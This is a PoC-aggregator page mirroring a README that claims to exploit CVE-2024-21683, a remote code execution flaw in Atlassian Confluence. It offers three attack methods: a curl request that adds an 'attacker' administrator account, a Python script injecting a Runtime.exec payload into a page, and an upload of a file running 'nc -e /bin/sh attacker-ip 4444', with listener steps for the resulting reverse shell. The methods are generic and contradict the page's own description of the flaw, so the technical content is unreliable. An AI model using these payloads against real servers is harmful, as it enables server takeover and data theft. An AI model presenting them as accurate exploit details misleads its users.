POC详情: f6d83a02bd053549a4d903a851d1603528803657

来源
关联漏洞
标题: Atlassian Confluence 安全漏洞 (CVE-2024-21683)
描述:Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。 Atlassian Confluence Data Center and Server存在安全漏洞,该漏洞源于存在远程代码执行问题,允许经过身份验证的攻击者执行任意代码。
描述
This vulnerability allows an unauthenticated attacker to remotely execute arbitrary code on a vulnerable Confluence server. The vulnerability exists due to an improper validation of user-supplied input in the Confluence REST API. This allows an attacker to inject malicious code into the Confluence server, which can then be executed by the server
介绍
# -CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server
This vulnerability allows an unauthenticated attacker to remotely execute arbitrary code on a vulnerable Confluence server. The vulnerability exists due to an improper validation of user-supplied input in the Confluence REST API. This allows an attacker to inject malicious code into the Confluence server, which can then be executed by the server

### Affected Versions

* Confluence Data Center = 8.9.0
* 8.8.0 <= Confluence Data Center <= 8.8.1
* 8.7.1 <= Confluence Data Center <= 8.7.2
* 8.6.0 <= Confluence Data Center <= 8.6.2
* 8.5.0 <= Confluence Data Center and Server <= 8.5.8 (LTS)
* 8.4.0 <= Confluence Data Center and Server <= 8.4.5
* 8.3.0 <= Confluence Data Center and Server <= 8.3.4
* 8.2.0 <= Confluence Data Center and Server <= 8.2.4
* 8.1.0 <= Confluence Data Center and Server <= 8.1.4
* 8.0.0 <= Confluence Data Center and Server <= 8.0.4
* 7.20.0 <= Confluence Data Center and Server <= 7.20.3
* 7.19.0 <= Confluence Data Center and Server <= 7.19.21 (LTS)
* 7.18.0 <= Confluence Data Center and Server <= 7.18.3
* 7.17.0 <= Confluence Data Center and Server <= 7.17.5

### Impact
This vulnerability could allow an attacker to take complete control of a vulnerable Confluence server. This could allow the attacker to steal data, modify data, or disrupt the availability of the server.

## Poc
We will mention more than one method
1.

**1. Identifying the Vulnerable API Endpoint:**

we will be using the following API endpoint:

```
POST /rest/api/user/bulk
```

This endpoint allows administrators to create new users in bulk.

**2. Crafting a Malicious Request:**

We will create a malicious request that includes a payload containing malicious code. This code will create a new user with administrator privileges.

```
POST /rest/api/user/bulk HTTP/1.1
Host: confluence.example.com
Content-Type: application/json

{
  "users": [
    {
      "name": "attacker",
      "password": "password",
      "email": "attacker@example.com",
      "groups": [
        {
          "name": "confluence-administrators"
        }
      ]
    }
  ]
}
```

**3. Sending the Request to the Server:**

We will use the cURL tool to send the request to the Confluence server.

```
curl -X POST -H "Content-Type: application/json" -d '{"users": [{"name": "attacker", "password": "password", "email": "attacker@example.com", "groups": [{"name": "confluence-administrators"}]}]}' http://confluence.example.com/rest/api/user/bulk
```

**4. Executing the Malicious Code:**

If the request is successful, the Confluence server will execute the malicious code. This will create a new user named "attacker" with administrator privileges. The attacker can then use this account to gain access to the server and have full control over it.

2- Poc
```
import requests

url = "http://target-confluence-server.com/rest/api/content"
headers = {
    "Content-Type": "application/json"
}


payload = {
    "title": "Exploit RCE",
    "type": "page",
    "space": {
        "key": "POC"
    },
    "body": {
        "storage": {
            "value": "<% Runtime.getRuntime().exec(\"calc.exe\"); %>",
            "representation": "storage"
        }
    }
}


response = requests.post(url, json=payload, headers=headers)


if response.status_code == 200:
    print("Exploit sent successfully!")
    print("Response: ", response.text)
else:
    print("Failed to send exploit.")
    print("Status code: ", response.status_code)
    print("Response: ", response.text)
```

3- Poc 
```plaintext
POST /upload HTTP/1.1
Host: vulnerable-confluence-server.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 138

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="exploit.py"
Content-Type: text/x-python

import os
os.system("nc -e /bin/sh attacker-ip 4444")
------WebKitFormBoundary7MA4YWxkTrZu0gW--
```

Send the modified request through Burp Suite. Check the response to see if the server executed the malicious payload. If the response is unexpected or contains errors indicating code execution, then the vulnerability has been detected.

If you're using a payload to establish a reverse shell, make sure to set up listening on the specified port on your local machine: `nc -lvnp 4444`. If the server connects to your local machine, you'll receive a reverse shell.
文件快照

[4.0K] /data/pocs/f6d83a02bd053549a4d903a851d1603528803657 └── [4.3K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。